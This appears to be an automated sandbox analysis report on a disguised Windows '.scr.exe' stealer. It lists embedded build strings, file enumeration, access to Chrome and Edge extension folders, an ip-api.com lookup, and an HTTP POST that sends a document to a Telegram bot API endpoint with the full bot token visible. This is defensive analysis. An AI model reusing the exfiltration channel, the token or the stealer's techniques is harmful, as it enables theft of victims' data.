              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF73AE27E4C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF73AE27E4C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose,0_2_00007FF73AE188D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF73AE31EE4
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,68_2_00007FF7F7EA46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EE88E0 FindFirstFileExA,68_2_00007FF7F7EE88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,68_2_00007FF7F7E9E21C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\Jump to behavior

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 692816User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=6d93bc963fb1d0e6724c699c271a2303
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D37000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2152267676.0000028C87D36000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2281491493.000001619A0F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2196248923.00000153734EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323026473.0000028C87C1F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/j
              Source: powershell.exe, 00000029.00000002.2198300195.0000015373670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
